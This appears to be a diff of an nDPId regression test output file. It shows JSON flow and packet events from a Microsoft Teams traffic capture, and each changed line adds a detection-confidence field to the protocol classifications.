 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
-00835{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00861{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1587041687731,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1587041687731,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM83AAAP8RRNjAqAEGwKgBAfUPADUAOAAFY+UBAAABAAAAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQAB"}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1587041687745,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":1587041687745,"pkt":"KDc3AG3IEBMx8Tl2CABFAADTPBBAADkRgbLAqAEBwKgBBgA19Q8AvwAAY+WBgAABAAQAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQABwAwABQABAAAGxQAfCmV1bm8tMS1hcGkOdHJhZmZpY21hbmFnZXIDbmV0AMA8AAUAAQAAABUACwhldW5vLTEtMcATwGcABQABAAAAOgApHWFtcy1ldW5vLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwFbAfgABAAEAAAAVAAQ0qbp3"}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.169.186.119"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.169.186.119"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687745,"flow_last_seen":1587041687745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1587041687745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041687745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGienAqAEGNKm6d+yTAbth0wzHAAAAALAC\/\/81+QAAAgQFtAEDAwUBAQgKMITCxwAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041687789,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GLFAAGwGRTw0qbp3wKgBBgG77JMQ1B2QYdMMyKASIACACgAAAgQFoAEDAwgEAggKASJ3bTCEwsc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041687789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGifXAqAEGNKm6d+yTAbth0wzIENQdkYAQEAm+kQAAAQEICjCEwvABIndt"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041688611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00365{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2313,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041689410,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
@@ -344,30 +344,30 @@
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2316,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1587041690880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"ts_msec":1587041690880,"pkt":"EBMx8Tl2KDc3AG3ICABFAABSJv0AAP8REUbAqAEGwKgBAfm6ADUAPoc2eGoBAAABAAAAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQAB"}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00777{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1587041690915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":301,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":301,"pkt_l4_len":267,"ts_msec":1587041690915,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEfVLxAADkRaLrAqAEBwKgBBgA1+boBCwAAeGqBgAABAAUAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAAACgAuHWFwcGxpY2F0aW9uaW5zaWdodHNfaW5nZXN0aW9uB21vbml0b3IFYXp1cmXALcBCAAUAAQAAAJEALB1hcHBsaWNhdGlvbmluc2lnaHRzX2luZ2VzdGlvbgtwcml2YXRlbGlua8BgwHwABQABAAAAXwAXAmRjDnRyYWZmaWNtYW5hZ2VyA25ldADAtAAFAAEAAAAeABwQY2ZyLWJyZWV6aWVzdC1pbghjbG91ZGFwcMDGwNcAAQABAAAABwAEKE+KKQ=="}
-00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1587041690915,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.79.138.41"}}
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1587041690915,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.79.138.41"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690916,"flow_last_seen":1587041690916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041690916,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1587041690916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041690916,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyUAbup7MP+AAAAALAC\/\/9nAwAAAgQFtAEDAwUBAQgKMITPEwAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041690946,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GwdAAG4GfY4oT4opwKgBBgG77JSCI5UvqezD\/6ASIAArFwAAAgQFoAEDAwgEAggKUvjCpTCEzxM="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041690946,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyUAbup7MP\/giOVMIAQEAlpqQAAAQEICjCEzzFS+MKl"}
-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1587041691075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1587041691075,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZLy0AAP8RCQ\/AqAEGwKgBAfWPADUARdrUdPIBAAABAAAAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="}
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1587041691148,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"ts_msec":1587041691148,"pkt":"KDc3AG3IEBMx8Tl2CABFAACQrGdAADkREZ7AqAEBwKgBBgA19Y8AfAAAdPKBgAABAAIAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAADwAGw9tc2dhcGktcHJvZC1zZnIIY2xvdWRhcHDANMBJAAEAAQAAAAoABDRybAg="}
-00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1587041691148,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.108.8"}}
+00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1587041691148,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.108.8"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691149,"flow_last_seen":1587041691149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041691149,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
